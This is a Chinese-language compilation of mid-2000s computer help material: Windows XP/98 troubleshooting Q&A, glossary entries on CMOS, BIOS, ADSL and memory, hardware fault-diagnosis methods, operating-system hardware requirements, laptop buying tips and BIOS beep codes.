答：默认情况下，系统是不允许低版本在高版本上安装的。所以我们只有在没有进入Windows XP系统之前安装Windows 98。首先设置系统启动顺序为光盘优先启动，然后启动电脑进行安装。在“选择Windows 98的安装目录”窗口上选择“其他目录”，并指定为Windows XP所在的分区以外的分区，最后按照常规方法完成安装。安装完后，你会发现双启动菜单并没有出现。可以用Windows XP的故障恢复控制台恢复双启动菜单：
1. 插入Windows XP安装盘，重新启动电脑，进入安装界面后，按下“R”键， 进入“Microsoft Windows XP（TM） 故障恢复控制台”界面；
2. 系统会搜寻已安装的Windows XP系统文件，然后显示搜寻结果，并询问“要登录到哪个Windows XP安装（要取消，请按Enter）”，选择Windows XP安装位置选项，系统会要输入“管理员密码”，键入安装Windows XP时设置的管理员密码，回车；
3. 在安装路径下输入修复命令Fixboot C:，回车。修复完成后，重启就可以恢复双启动菜单了。

问：硬盘的每一个分区中都有一个“System Volume Information”，看着很碍眼，点击却拒绝访问，能不能把它删除掉？
答：你只需选择“工具→文件夹选项→查看”，将“隐藏受保护的操作系统文件”选择上即可将该文件夹隐藏。这个文件夹的作用是用来保存系统还原备份文件的，在Windows XP中，你只要关闭“系统还原”功能就可以删除这个文件夹中保存的文件，记住必须以Administrator（管理员）身份登录系统才可以。

问：我用的是Windows XP系统，但总会出现一个文件保护的窗口，内容是：“正常运行的Windows所需文件已被替换成无法识别的版本。要保持系统稳定，Windows必须还原这些文件原有版本，现在插入您的Windows XP CD—ROM”。如果我按否，再启动则死机，重装了几次系统后仍出现请问是什么原因？
答：龙哥最近也遇到了这个问题，原以为插入系统安装盘就可以恢复系统，但恢复后，这个提示框依旧出现。后来发现这是劳拉（win32 xorala 2048）病毒造成的，这种病毒只针对Windows 2000/XP系统，感染后它会替换系统中的EXE应用程序为病毒文件。使用最新病毒库的杀毒软件就可以查杀该病毒了。

问：我的电脑总提示内存不足，按“Ctrl+Alt＋Del”后发现，进程中有不少的“winoldap”。如果重启，可以解决问题，但过不了多长时间故障又会出现了，请问我该如何解决？
答：你一定是运行了一些DOS下的应用程序，很多DOS程序在Windows 2000/XP的电脑上运行完成后，不会自动退出，而是驻留于内存中，一定时间后就会导致内存资源严重耗尽。你可以手工禁止，也可以试着找到运行的DOS程序，在属性窗口中单击“程序”，选中“禁止MS-DOS程序检测Windows”复选框禁止该DOS程序。

问：以前我用FlashGet和NetAnts下载软件都很正常，但现在我重装了操作系统，用FlashGet和NetAnts下载软件显示“打开方式”，许多都打不开。希望您能帮我想想办法，恢复以前那样。
答：FlashGet等下载软件一般会给未下载完的文件添加.jc!的后缀，下载完成后会自动去掉该后缀，可能由于一些特殊的情况造成无法自动完成该工作，造成了你遇到的这种现象。手工去掉.jc!后缀即可恢复文件正常，另外你可以在FlashGet中选择“工具→选项”，将“添加后缀jc!直到文件下载完成”去掉可以避免这个问题。


电脑知识面面观

《一键清理系统垃圾》

电脑知识面面观

什么是CMOS

   CMOS（本意是指互补金属氧化物半导体——一种大规模应用于集成电路芯片制造的原料）是微机主板上的一块可读写的RAM芯片，用来保存当前系统的硬件配置和用户对某些参数的设定。CMOS可由主板的电池供电，即使系统掉电，信息也不会丢失。CMOS RAM本身只是一块存储器，只有数据保存功能，而对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留在软盘上的(如IBM的PC/AT机型)，使用很不方便。现在多数厂家将CMOS设置程序做到了BIOS芯片中，在开机时通过特定的按键就可进入CMOS设置程序方便地对系统进行设置，因此CMOS设置又被叫做BIOS设置。早期的CMOS是一块单独的芯片MC146818A(DIP封装)，共有64个字节存放系统信息,见CMOS配置数据表。386以后的微机一般将MC146818A芯片集成到其它的IC芯片中(如82C206，PQFP封装)，最新的一些586主板上更是将CMOS与系统实时时钟和后备电池集成到一块叫做DALLDA DS1287的芯片中。随着微机的发展、可设置参数的增多，现在的CMOS RAM一般都有128字节及至256字节的容量。为保持兼容性，各BIOS厂商都将自己的BIOS中关于CMOS RAM的前64字节内容的设置统一与MC146818A的CMOS RAM格式一致，而在扩展出来的部分加入自己的特殊设置，所以不同厂家的BIOS芯片一般不能互换，即使是能互换的，互换后也要对CMOS信息重新设置以确保系统正常运行.你认识主板上的BIOS芯片吗？介绍常见的BIOS芯片的识别ROM BIOS是主板上存放微机基本输入输出程序的只读存贮器，其功能是微机的上电自检、开机引导、基本外设I/O和系统CMOS设置。主板上的ROM BIOS芯片是主板上唯一贴有标签的芯片，一般为双排直插式封装(DIP)，上面印有“BIOS”字样。虽然有些BIOS芯片没有明确印出“BIOS”，但凭借外贴的标签也能很容易地将它认出。586以前的BIOS多为可重写EPROM芯片，上面的标签起着保护BIOS内容的作用(紫外线照射会使EPROM内容丢失)，不能随便撕下。586以后的ROM BIOS多采用EEPROM(电可擦写只读ROM)，通过跳线开关和系统配带的驱动程序盘，可以对EEPROM进行重写，方便地实现BIOS升级。常见的BIOS芯片有AMI、Award、Phoenix等，在芯片上都能见到厂商的标记。

什么是ADSL？

  “超级一线通”——ADSL的中文名称是“非对称数字用户环路”，是一种在普通电话线上进行宽带通信的技术。ADSL技术充分利用现有的铜线资源，在1对双绞线上提供上行640kbps、下行8Mbps的带宽，传输速度是普通MODEM的140倍。
   ADSL采用的是专线的连接方式，ADSL调制解调器与网络总是处于连接的状态，免去了拨号上网的麻烦。另外，它还可以同时进行数据和语音通信。
   ADSL采用DMT（离散多音频）技术，将原先电话线路0Hz到1.1MHz频段划分成256个频宽为4.3kHz的子频带。ADSL的下载速度最小为265Kbps，最高可达8M bps。而最近刚刚推出的G.Lite标准则可以提供1.5M的下载速率，即便是G.Lite的速度也已经是56K猫的25倍了。

什么是BIOS

   系统开机启动BIOS，即微机的基本输入输出系统(Basic Input-Output System)，是集成在主板上的一个ROM芯片，其中保存有微机系统最重要的基本输入/输出程序、系统信息设置、开机上电自检程序和系统启动自举程序。在主板上可以看到BIOS ROM芯片。一块主板性能优越与否，很大程度上取决于板上的BIOS管理功能是否先进。
   一、BIOS中断例程 即BIOS中断服务程序。它是微机系统软、硬件之间的一个可编程接口，用于程序软件功能与微机硬件实现的衍接。DOS/Windows操作系统对软、硬盘、光驱与键盘、显示器等外围设备的管理即建立在系统BIOS的基础上。程序员也可以通过对INT 5、INT 13等中断的访问直接调用BIOS中断例程。
   二、BIOS系统设置程序 微机部件配置情况是放在一块可读写的CMOS RAM芯片中的，它保存着系统CPU、软硬盘驱动器、显示器、键盘等部件的信息。关机后，系统通过一块后备电池向CMOS供电以保持其中的信息。如果CMOS中关于微机的配置信息不正确，会导致系统性能降低、零部件不能识别，并由此引发一系统的软硬件故障。在BIOS ROM芯片中装有一个程序称为“系统设置程序”，就是用来设置CMOS RAM中的参数的。这个程序一般在开机时按下一个或一组键即可进入，它提供了良好的界面供用户使用。这个设置 CMOS参数的过程，习惯上也称为“BIOS设置”。新购的微机或新增了部件的系统，都需进行BIOS设置。
   三、POST上电自检 微机接通电源后，系统将有一个对内部各个设备进行检查的过程，这是由一个通常称之为POST(Power On Self Test,上电自检)的程序来完成的。这也是BIOS的一个功能。完整的POST自检将包括CPU、640K基本内存、1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘测试。自检中若发现问题，系统将给出提示信息或鸣笛警告。
   四、BIOS系统启动自举程序 在完成POST自检后，ROM BIOS将按照系统CMOS设置中的启动顺序搜寻软硬盘驱动器及CDROM、网络服务器等有效的启动驱动器，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动。

什么是CPU？

   CPU即中央处理器，它是计算机的大脑，计算机的运算、控制都是由它来处理的。它的发展非常迅速，就像一列不断在加速的列车一样。个人电脑从 8088(XT)发展到现在的Pentium IIII时代，只经过了大约20年的时间。从生产技术来说，最初的8088集成了29000个晶体管，而高能奔腾的集成度超过了750万个晶体管；从CPU的运行速度，以MIPS(百万个指令每秒)为单位，8088是0.75，而速度最快的高能奔腾超过了1000。

什么是Internet？

   它的中文名字就是我们常说的因特网。

什么是网络？
   简单说来就是利用通信线路将不同地理位置的多个功能独立的计算机互相连接起来，并在网络软件和相关硬件的支持下实现数据通信和资源共享。
   根据网络规模大小和计算机所处位置的远近不同，我们可以分为局域网、城域网和广域网。局域网通常是指把分散在一幢大楼、校园或工厂的若干计算机连接在一起而构成的网络，它的通信距离比较小，覆盖范围也局限于几十米到几千米，例如一所学校的校园网；城域网又称为城市区域网络或大都市网络，城域网的规模大约一个城市，比广域网小，但比局域网大；广域网又称远程网络或远距离网络，它实现了跨城市、跨地区的远程连接，覆盖范围可以是一个地区、一个城市、一个城市、一个国家甚至洲际之间，Internet网于是便成为了世界上最大的广域网络，它也使全球范围内的信息传递与资源共享成为可能。

   Internet能为您做什么呢？
   1、可以收发电子邮件；
   2、可以获取所需的信息；
   3、向世界传送你的信息；
   4、打国际长途；
   其实因特网可以做的事还很多，如网络游戏等，怎么样？很感兴趣吧？快跟我来，让我们一起去遨游那广阔而奇妙的网络世界。

什么是内存

   什么是内存呢？在计算机的组成结构中，有一个很重要的部分，就是存储器。存储器是用来存储程序和数据的部件，对于计算机来说，有了存储器，才有记忆功能，才能保证正常工作。存储器的种类很多，按其用途可分为主存储器和辅助存储器，主存储器又称内存储器（简称内存），辅助存储器又称外存储器（简称外存）。外存通常是磁性介质或光盘，像硬盘，软盘，磁带，CD等，能长期保存信息，并且不依赖于电来保存信息，但是由机械部件带动，速度与CPU相比就显得慢的多。内存指的就是主板上的存储部件，是CPU直接与之沟通，并用其存储数据的部件，存放当前正在使用的（即执行中）的数据和程序，它的物理实质就是一组或多组具备数据输入输出和数据存储功能的集成电路，内存只用于暂时存放程序和数据，一旦关闭电源或发生断电，其中的程序和数据就会丢失。
   既然内存是用来存放当前正在使用的（即执行中）的数据和程序，那么它是怎么工作的呢？我们平常所提到的计算机的内存指的是动态内存（即DRAM），动态内存中所谓的“动态”，指的是当我们将数据写入DRAM后，经过一段时间，数据会丢失，因此需要一个额外设电路进行内存刷新操作。具体的工作过程是这样的：一个DRAM的存储单元存储的是0还是1取决于电容是否有电荷，有电荷代表1，无电荷代表0。但时间一长，代表1的电容会放电，代表0的电容会吸收电荷，这就是数据丢失的原因；刷新操作定期对电容进行检查，若电量大于满电量的1／2，则认为其代表1，并把电容充满电；若电量小于1／2，则认为其代表0，并把电容放电，藉此来保持数据的连续性。
   从一有计算机开始，就有内存。内存发展到今天也经历了很多次的技术改进，从最早的DRAM一直到FPMDRAM、EDODRAM、SDRAM等，内存的速度一直在提高且容量也在不断的增加。今天，服务器主要使用的是什么样的内存呢？目前，IA架构的服务器普遍使用的是REG.ISTEREDECCSDRAM。

什么是宽带网

   通常人们把骨干网传输速率在2.5G以上、接入网能够达到1兆的网络定义为宽带网。
   宽带网建设分为3层：骨干网、城域网和社区网接入网。骨干网相当于城市与城市之间的高速公路，城域网相当于城市市区内的道路，社区接入网解决的则是将道路从市区一直修到小区，抵达每户的家门口。
   现在大部分用户通过电话线上网，其传输速率只有64K，而接入社区的宽带网能够为用户提供10兆至100兆的网络宽带，上网速度将是目前的100倍以上。
   宽带网将使往日互联网的梦想变为现实。社区宽带网可提供方便快捷的网上视频点播、可视电话和视频会议、电子商务、网上物业办公、远程医疗、远程教育等等。小区住户可以在家中随意点播数据库中的影视节目，即使几百人甚至上千人同时点播，也不会相互影响播放速度。
   目前，社区宽带网有3种接入方式：ADSL、Cable Modem和以太网技术。第一种方式是对传统电话线进行改造，实现宽带接入；第二种是利用现有的有线电视网，用户需要增加一个有线调制解调器；第三种则是重新铺设线路，光纤到楼、双绞线入户，为用户提供独享带宽。由于前两种改造需要昂贵的费用，一般多采用以太网技术实现社区宽带网接入。
   目前，在宽带网的建设和使用普及率上居世界首位的是韩国，其宽带网普及率为57．3％；美国的宽带网普及率为11．l％；欧盟各国也正在发展各自的宽带网络。
   今年3月通过的《“十五”计划纲要》中首次明确提出，我国要大力发展高速宽带信息网，重点建设宽带接入网，适时建设第三代移动通信网。目前，宽带网建设高潮已经在全国范围内兴起，基础电信运营商（中国电信、网通、铁通等）和新兴的宽带接入商（蓝波万维、长城宽带等）纷纷大举进军社区宽带网。
   宽带网上可以直接传输声音、图像和数据，长途电话和市话的区别也将消失。宽带网技术将实现人们常说的“三网合一”。


给新手的电脑维修资料

《一键清理系统垃圾》

给新手的电脑维修资料

有很多新手对于一些电脑常见故障的排除，都不是太明白，而论坛里有些高手平时很忙，或者说对新手提出的问题，认为太简单，都不能够及时作出回答，这样新手们在这里很可能不能够及时的把问题得到解决。。。。　所以我现在把电脑的一些常见故障的排除方法，以及原则写给大家。。。
希望对新手有帮助。。。谢谢！
[授人以鱼,不如授人以渔,(希望大家能从以下方法中学习到更多的实际经验)]
（正题）
平时常见的微机故障现象中,有很多并不是真正的硬件故障,而是由于某些设置或系统特性不为人知而造成的假故障现象。认识下面的微机假故障现象有利于快速地确认故障原因，避免不必要的故障检索工作。
    1、电源插座、开关 很多外围设备都是独立供电的，运行微机时只打开计算机主机电源是不够的。例如：显示器电源开关未打开，会造成“黑屏”和“死机”的假象；外置式MODEM电源开关未打开或电源插头未插好则不能拨号、上网、传送文件，甚至连MODEM都不能被识别。打印机、扫描仪等都是独立供电设备，碰到独立供电的外设故障现象时，首先应检查设备电源是否正常、电源插头/插座是否接触良好、电源开关是否打开。
    2、连线问题 外设跟计算机之间是通过数据线连接的，数据线脱落、接触不良均会导致该外设工作异常。如：显示器接头松动会导致屏幕偏色、无显示等故障；又如：打印机放在计算机旁并不意味着打印机连接到了计算机上，应亲自检查各设备间的线缆连接是否正确。
    3、设置问题 例如：显示器无显示很可能是行频调乱、宽度被压缩，甚至只是亮度被调至最暗；音箱放不出声音也许只是音量开关被关掉；硬盘不被识别也许只是主、从盘跳线位置不对……。详细了解该外设的设置情况，并动手试一下，有助于发现一些原本以为非更换零件才能解决的问题。
    4、系统新特性 很多“故障”现象其实是硬件设备或操作系统的新特性。如：带节能功能的主机，在间隔一段时间无人使用计算机或无程序运行后会自动关闭显示器、硬盘的电源，在你敲一下键盘后就能恢复正常。如果你不知道这一特征，就可能会认为显示器、硬盘出了毛病。再如Windows、NC的屏幕保护程序常让人误以为病毒发作…… 多了解微机、外设、应用软件的新特性、多向专家请教，有助于增加知识、减少无谓的恐慌。 \[]5、其它易疏忽的地方 CD-ROM的读盘错误也许只是你无意中将光盘正、反面放倒了；软盘不能写入也许只是写保护滑到了“只读”的位置。发生了故障，首先应先判断自身操作是否有疏忽之处，而不要盲目断言某设备出了问题。
微机故障常见的检测方法
    1、清洁法 对于机房使用环境较差，或使用较长时间的机器，应首先进行清洁。可用毛刷轻轻刷去主板、外设上的灰尘，如果灰尘已清扫掉，或无灰尘，就进行下一步的检查。另外，由于板卡上一些插卡或芯片采用插脚形式，震动、灰尘等其他原因，常会造成引脚氧化，接触不良。可用橡皮擦擦去表面氧化层，重新插接好后开机检查故障是否排除。
    2、直接观察法 即“看、听、闻、摸”。 “看”即观察系统板卡的插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间(造成短路)，也可以看看板上是否有烧焦变色的地方，印刷电路板上的走线(铜箔)是否断裂等等。 “听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外，系统发生短路故障时常常伴随着异常声响。监听可以及时发现一些事故隐患和帮助在事故发生时即时采取措施。 “闻”即辨闻主机、板卡中是否有烧焦的气味，便于发现故障和确定短路所在地。 “摸”即用手按压管座的活动芯片，看芯片是否松动或接触不良。另外，在系统运行时用手触摸或*近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常；用手触摸一些芯片的表面，如果发烫，则为该芯片损坏。
    3、拔插法 PC机系统产生故障的原因很多，主板自身故障、I/O总线故障、各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。拔插法的另一含义是：一些芯片、板卡与插槽接触不良，将这些芯片、板卡拔出后在重新正确插入可以解决因安装接触不当引起的微机部件故障。
    4、交换法 将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来判断故障部位，无故障芯片之间进行交换，故障现象依旧，若交换后故障现象变化，则说明交换的芯片中有一块是坏的，可进一步通过逐块交换而确定部位。如果能找到相同型号的微机部件或外设，使用交换法可以快速判定是否是元件本身的质量问题。交换法也可以用于以下情况：没有相同型号的微机部件或外设，但有相同类型的微机主机，则可以把微机部件或外设插接到该同型号的主机上判断其是否正常。
    5、比较法 运行两台或多台相同或相类似的微机，根据正常微机与故障微机在执行相同操作时的不同表现可以初步判断故障产生的部位。
    6、振动敲击法 用手指轻轻敲击机箱外壳，有可能解决因接触不良或虚焊造成的故障问题。然后可进一步检查故障点的位置排除之。
    7、升温降温法 人为升高微机运行环境的温度，可以检验微机各部件（尤其是CPU）的耐高温情况，因而及早发现事故隐患。 人为降低微机运行环境的温度，如果微机的故障出现率大为减少，说明故障出在高温或不能耐高温的部件中，此举可以帮助缩小故障诊断范围。事实上，升温降温法是采用的是故障促发原理，以制造故障出现的条件来促使故障频繁出现以观察和判断故障所在的位置。
    8、程序测试法 随着各种集成电路的广泛应用，焊接工艺越来越复杂，同时，随机硬件技术资料较缺乏，仅*硬件维修手段往往很难找出故障所在。而通过随机诊断程序、专用维修诊断卡及根据各种技术参数(如接口地址)，自编专用诊断程序来辅助硬件维修则可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片(如寄存器)状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及总线基本运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面、有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况。软件诊断法要求具备熟练编程技巧、熟悉各种诊断程序与诊断工具(如debug、DM等)、掌握各种地址参数(如各种I/O地址)以及电路组成原理等，尤其掌握各种接口单元正常状态的各种诊断参考值是有效运用软件诊断法的前提基础.


根据电脑配置选择操作系统

《一键清理系统垃圾》

根据电脑配置选择操作系统

   如果你有一台电脑，首要的问题就是安装操作系统。但是那么多的操作系统，选择什么操作系统好呢？当然，安装操作系统是要根据自己电脑的硬件配置，无论是装一个操作系统还是多个操作系统，那么还是先看看目前流行的几个操作系统对电脑硬件配置的要求吧！这样才好对症下药啊！选择合适的操作系统才能够让你的电脑运行的更快、更加顺畅！

Windows 98的建议硬件配置

微软官方网站称运行Windows 98的最低配置为：
cpu: 486DX 66MHz
内存：大于等于16MB,推荐24MB
硬盘空间: 120~295兆自由空间
软驱:VGA或SVGA

但根据实际运行情况，应使用如下配置才能得到较满意的运行效果：
CPU 200MMX以上
内存 至少为32MB,48MB或以上更好
VCG显示卡符合WIN 98最低要求，但要充分发挥WIN 98的性能，最好还是具有3D加速器的显示卡

Windows Me的建议硬件配置

微软官方网站称运行Windows Me的最低配置为：
VGA或者更高分辨率的显示器
奔腾150MHz以上处理器
32MB以上内存
最少320MB的剩余硬盘空间
CD-ROM驱动器
28.8 Kbs Modem或者更快的Internet连接
声卡
扬声器或者耳机
Microsoft鼠标或者兼容的指定设备

但根据实际运行情况，应使用如下配置才能得到较满意的运行效果：
CPU: PII 300
内存：64MB以上内存

Windows 2000的建议硬件配置

a. win 2k professional

133MHz或更高主频的Pentium兼容CPU
推荐最少64兆（MB）随机存储器，增加内存通常会改善系统的响应速率
需要2GB硬盘并提供1GB的自由空间（如果在网络上进行安装，必须附加的自由硬盘容量）
Windows 2000 Professional支持一到两个CPU

但根据实际运行情况，应使用如下配置才能得到较满意的运行效果：
CPU：最好使用MMX200以上档次，现在的低档CPU赛扬系列和AMDK6-2系列都能够满足要求
内存：强烈建议使用64MB以上的内存，如果你要在Windows2000下运行比较大的应用程序，最好配备128MB以上的内存
硬盘：10G以上7200转支持DMA/66的硬盘是比较理想的
Windows2000具有高级电源管理和即插即用特性
如果主板的BIOS较老将可能不兼容于Windows2000，而导致种种问题。这时你需要升级兼容WIN2000的最新BIOS

b. win 2k server

133MHz或更高的Pentium兼容的CPU
建议至少有256MB的RAM（最小支持128MB；最大支持4GB ）
2GB的硬盘，至少有1.0GB的空闲空间（如果你是通过网络进行安装将需要额外的硬盘空间）
Windows 2000 Server最多支持在一台机器上有4个CPU

c. win 2k advanced server

133MHz或更高的Pentium兼容的CPU
建议至少有256MB的RAM（最小支持128MB；最大支持8GB）
2GB的硬盘，至少有1.0GB的空闲空间（如果你是通过网络进行安装将需要额外的硬盘空间）
Windows 2000 Advanced Server最多支持在一台机器上有8个CPU

d. win 2k datacenter

该版本适用于大型企业，比如民航部门使用，个人用户不可能用到。

Windows NT的建议硬件配置

Windows NT Workstation 4.0

a.基于Intel系统

奔腾或者更快的处理器，16MB内存(RAM)，建议使用32MB内存
110MB的可使用硬盘空间
CO-ROM驱动器(光驱)或是可通过计算机网络访问光驱
VGA或是更高的显示卡解决方案

b.基于RISC系统

其有Alpha Axp，MIPSR4X100，或是Power PC处理器的工作站
16MB内存
110MB的可使用硬盘空间
CD-ROM驱动器(光驱)或是可通过计算机网络访问光驱
VGA或是更高级的显示卡解决方案
微软鼠标或是兼容性鼠标

Windows NT Server 4.0

a.基于Intel系统

CPU:486/33 MHz或Pentium或Pentium PRO
磁盘空间：不小于125MB

b.基于RISC系统

磁盘空间：不小于160 MB
内存：16 MB
CD-ROM drive
VGA或SVGA

Windows XP的建议硬件配置

Windows XP比其它我们以前见过的各个版本的Windows对于系统的要求更高，如果你的处理器、内存、磁盘空间和显卡的容量没有达到Windows XP的最低要求，它根本不会运行。
Windows XP的最低运行要求：
233MHz CPU (推荐300MHz或者更高)
64MB RAM
1.5GB空余磁盘空间
SVGA(800x600分辨率)显卡和显示器
CD-ROM或者DVD驱动器
当然了，硬件配置越高越好，能够改善系统的性能。
对于硬盘来说，它应该支持Ultra-ATA66或者ATA100 IDE，平均搜寻时间为10毫秒，至少256-512KB缓冲
显卡应该是带有4MB或者更多显示RAM的PCI卡，AGP更好
CDROM光驱应该是最近的8X、12X或者16X ATAPI
声卡也应该是最近型号的PCI卡
老的ISA插槽的卡(通常在主板上是黑色的)要比PCI插槽(通常是白色的)和AGP(通常是绿色)插槽要慢，而且很难“即插即用”同时让Windows能够确定

a. XP home edition

要使用Microsoft Windows XP Home Edition需要：
推荐采用处理器时钟频率为300 MHz或者更高的电脑，最小需求为233 MHz*；推荐采用Intel Pentium\Celeron 家族、AMD K6\Athlon\Duron 家族、或者其他兼容处理器
推荐采用128 MB或者更多内存（最小支持64M内存，但会影响执行性能并限制某些功能的使用）
1.5GB的可用磁盘空间
SVGA（800 x 600）或更高解析度的视频适配器和监视器
CD-ROM或者DVD驱动器
键盘、DVD解码卡或者DVD解码软件

b. XP professional

要使用 Microsoft Windows XP Professional需要：
推荐计算机使用时钟频率为 300 MHz 或更高的处理器；至少需要 233 MHz （单个或双处理器系统）；推荐使用 Intel Pentium/Celeron 系列、AMD K6/Athlon/Duron 系列或兼容的处理器
推荐使用128MB RAM 或更高（最低支持 64M；可能会影响性能和某些功能）
1.5GB可用硬盘空间
Super VGA (800x600) 或分辨率更高的视频适配器和监视器
CD-ROM或DVD驱动器
键盘和 Microsoft鼠标或兼容的指针设备

Linux的建议硬件配置

当前各种主流的Linux发行版的一个典型安装普遍要求为：
600MB以上硬盘分区
Pentium166MMX以上CPU
32MB以上内存方能运行良好

从普通用户的普遍反应看，最低要求是：
486/66、16MB 内存、200MB以上硬盘空间
在不同配置的机器上Linux运行速度差别相当明显


购买笔记本四步走：望、闻、问、切

《一键清理系统垃圾》

购买笔记本四步走：望、闻、问、切

   如何选择我们需要的笔记本电脑，让我们不妨借用一下中医的“望、闻、问、切”。
   望：多看正规渠道的货，其正式代理商一般都会在底部贴有专用标签，写明产品型号。如IBM的Think Pad笔记本电脑，机器底部有产品型号和序列号，其产品型号的最后一位是以C为结尾，表示China，如果不是，那就是水货了。另外，还要注意操作系统恢复盘、安装盘是否与机器上的操作系统相符。还要检查笔记本电脑的外观是否有碰、擦、划、裂等伤痕，液晶显示屏（LCD）是否有划伤、坏点、波纹，螺丝是否有掉漆等现象。
   闻：一听机器本身，二听八方消息。听听机器运转之后有没有什么异响，笔记本电脑应该是很安静的，另外，调试一下声音大小，如果效果很好，声音很均衡，那么恭喜你买到一个好货！除了机器本身，在购买之前要多听听各方的声音，才能胸有成竹。
   问：在购买机器前要不耻下问。特别还要注意一定要问笔记本电脑所用的是不是移动型Intel P4 CPU（即是否有M后缀），因为现在P4移动型和台式机型CPU的内核，除了省电功能、散热量等指标外，其他性能指标完全一样。
   切：要想买到一个好本本，还得亲自上阵。主要应从键盘舒适度、电池容量、售后服务、市场口碑四方面来感觉。从经验及市场反映来看IBM笔记本电脑的键盘舒适度很不错。总体原则是选择大容量锂电池，而电池容量的检查主要以软件检查为主，原则是新笔记本电脑的电量不应高于3％。售后服务当然也是决定选择的一大方面，这方面大的品牌做得比较好一点。


故障排除手册

《一键清理系统垃圾》

故障排除手册

一、 计算机故障可分为硬件和非硬件故障
1. 硬件故障常见现象：
如主机无电源显示、显示器无显示、主机喇叭鸣响并无法使用、显示器提示出错信息但无法进入系统。
2. 软件故障常见现象：
如显示器提示出错信息无法进入系统，进入系统但应用软件无法运行。

二、 对故障的操作方法：
1. 先静后动：先分析考虑问题可能在哪，然后动手操作
2. 先外后内：首先检查计算机外部电源、设备、线路，后再开机箱；
3. 先软后硬：先从软件判断入手，然后再从硬件着手。
三、 对故障的具体操作：
1. 计算机主机或显示器无电源显示：检查计算机外部电源线及显示器电源插头；
2. 显示器无显示或音响无声音：可检查显卡或声卡有无松动或插头是否插紧；
3. 主机喇叭鸣响：可根据响声数来判断错误
AMI的BIOS
1响内存刷新故障，2响内存校验错，3响64K基本内存故障,4响系统时钟或内存错,5响CPU故障,6响键盘故障,7响硬中断故障，8响显存错误，9响主板RAM、ROM校验错或显卡错，10响CMOS出错
AWARD的BIOS
1响:内存刷新故障系统正常 2响:内存校验错CMOS设置错或主板RAM出错
3响:64K基本内存故障 显卡故障 4响:系统时钟或内存错 键盘错
5响:CPU故障 6响:键盘故障
7响:硬中断故障 8响:显存错误
9响:主板RAM、ROM校验错或显卡错 10响:CMOS错 主板RAM、ROM错误
4. 应用软件故障：
(A)首先用带系统软盘启动计算机，在Dos状态下用杀病毒软件检查硬盘；
(B)如硬盘无法启动可先用原硬盘中相同版本系统软盘启动并用SYS传系统文件到硬盘或用FDISK检查硬盘分区是否正确；
(C)启动计算机并按下F8键，选菜单第3项进入Windows安全模式，检查故障并重新启动；
(D)对该软件UNINSTALL及删除其所在目录后，重新安装该软件。
四、 根据屏幕提示错误信息判断：
(A)CMOS Battery State LOW(CMOS电池不足)；
(B)Keyboard Interface Error(键盘接口错误)；
(C)Hard disk drive failure（硬盘故障）；
(D)hard disk not present(硬盘参数错误)；
(E)Missing operating System(硬盘主引导区被破坏)；
(F)Non System Disk Or Disk Error(启动系统文件错误)；
(G)Replace Disk And Press A Key To Reboot(CMOS硬盘参数设置错误)；
(H)Invalid Media Type Reading Drive C硬盘参数不匹配)；
(I)Invalid Drive Specification(硬盘BOOT引导系统被破坏)；
(J)Invalid BOOT Diskette，Diskette BOOT Failure(软盘引导系统错)；
(K)FDD Controller Failure BIOS(软驱控制错误)；
(L)HDD Controller Failure BIOS(硬盘控制错误)；
(M)Drive Error (BIOS未收到硬盘响应信号)；
(N)Cache Memory Bad, Do Not Enable Cache(主板Cache故障)
非硬件故障

1、 电源插座、开关 很多外围设备都是独立供电的,运行微机时只打开计算机主机电源是不够的。例如：显示器电源开关未打开,会造成“黑屏”和“死机”的假象;外置式MODEM电源开关未打开或电源插头未插好则不能拨号、上网、传送文件,甚至于连MODEM都不能被识别。打印机、扫描仪等都是独立供电设备,碰到独立供电的外设故障现象时，首先应检查设备电源是否正常、电源插头/插座是否接触良好、电源开关是否打开。
2、 连线问题： 外设跟计算机之间是通过数据线连接的，数据线脱落、接触不良均会导致该外设工作异常。如：显示器接头松动会导致屏幕偏色、无显示故障等等；又如：打印机放在计算机旁并不意味着打印机连接到了计算机上，应亲自检查各设备间的线缆连接是否正确。
3、 设置问题： 例如：显示器无显示很可能是行频调乱、宽度被压缩，甚至只是亮度被调至最暗；音箱放不出声音也许只是音量开关被关掉;硬盘不被识别也许只是主、从盘跳线位置不对……。详细了解该外设的设置情况，并动手试一下，有助于发现一些原本以为非更换零件才能解决的问题
4、 系统新特性： 很多“故障”现象其实是硬件设备或操作系统的新特性。如：带节能功能的主机,在间隔一段时间无人使用计算机或无程序运行后会自动关闭显示器、硬盘的电源，在你敲一下键盘后就能恢复正常。如果你不知道这一特征，就可能会认为显示器、硬盘出了毛病。

通过以上内容，大家大致就可以判断出问题的所在了。
我个人认为 其实解决问题不难 难就难在发现问题
希望上面的文字对大家有些有处。

--------------------------------------------------------------------------------
作者: 无知男人　　时间: 2005-9-13 11:31　　 标题: 故障排除手册

常用的检测方法
1、 清洁法： 对于机房使用环境较差，或使用较长时间的机器,应首先进行清洁。可用毛刷轻轻刷去主板、外设上的灰尘,如果灰尘已清扫掉，或无灰尘，就进行下一步的检查。 另外，由于板卡上一些插卡或芯片采用插脚形式，震动、灰尘等其他原因，常会造成引脚氧化,接触不良。可用橡皮擦擦去表面氧化层，重新插接好后开机检查故障是否排除。
